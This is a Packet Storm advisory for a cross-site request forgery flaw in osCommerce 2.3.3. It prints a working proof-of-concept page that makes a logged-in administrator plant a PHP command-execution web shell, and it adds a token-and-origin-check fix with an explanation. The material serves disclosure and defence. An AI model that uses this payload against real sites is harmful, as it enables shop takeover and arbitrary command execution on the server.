osCommerce 2.3.3 Cross Site Request Forgery

2013-02-12T00:00:00
ID PACKETSTORM:120223
Type packetstorm
Reporter Jakub Galczyk
Modified 2013-02-12T00:00:00

Description

```php
<?php
/*
* this is simple proof-of-c0ncept for csrf in latest
* osCommerce (2.3.3).
*
* Admin, after visiting this page, will add php-shell-code to file:
* ./catalog/includes/languages/english/download.php, so now if we
* add 'cmd' param to this file, our 'shell' will print command output.
*
* --- there should be more this kind of bugs in this webapp.
* 22.o1.2o13 o/
*/
?>

<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="<?php $cmd = $_GET['cmd']&#x3b; echo '<pre>' . shell_exec($cmd) . '</pre>'&#x3b; ?>">

</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>
```
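The root cause is that the admin save handler accepts any POST from a logged-in browser, so a page on another site can submit the form for the administrator. The following is an added example of the standard fix, not osCommerce's own code: a per-session synchronizer token checked with a constant-time compare, plus an Origin/Referer check, run before anything is written to the language file. The function names and the `csrf_token` field are assumptions.

```php
<?php
// Added example (not osCommerce code): CSRF defence for an admin form handler
// such as define_language.php?action=save. All names here are hypothetical.

session_start();

// Issue one unguessable token per session and embed it in every admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to place inside each <form>; a cross-site page cannot read it.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">';
}

// Accept the request only if the submitted token matches the session token.
// hash_equals() avoids leaking the token through timing differences.
function csrf_check(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Defence in depth: state-changing requests must come from this host.
// Origin is preferred; Referer is the fallback for browsers that omit Origin.
function same_origin(array $server, string $allowed_host): bool {
    $src  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $allowed_host) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_GET['action'] ?? '') === 'save') {
    if (!csrf_check($_POST) || !same_origin($_SERVER, $_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        // Log the rejection: repeated failures here are a useful detection signal.
        error_log('define_language save rejected: CSRF token or origin check failed');
        exit('Forbidden');
    }
    // Only now is it safe to persist $_POST['file_contents'] to the language file.
}
```

The auto-submitting form from the advisory carries no `csrf_token` and arrives with a foreign Origin, so it fails both checks and nothing is written.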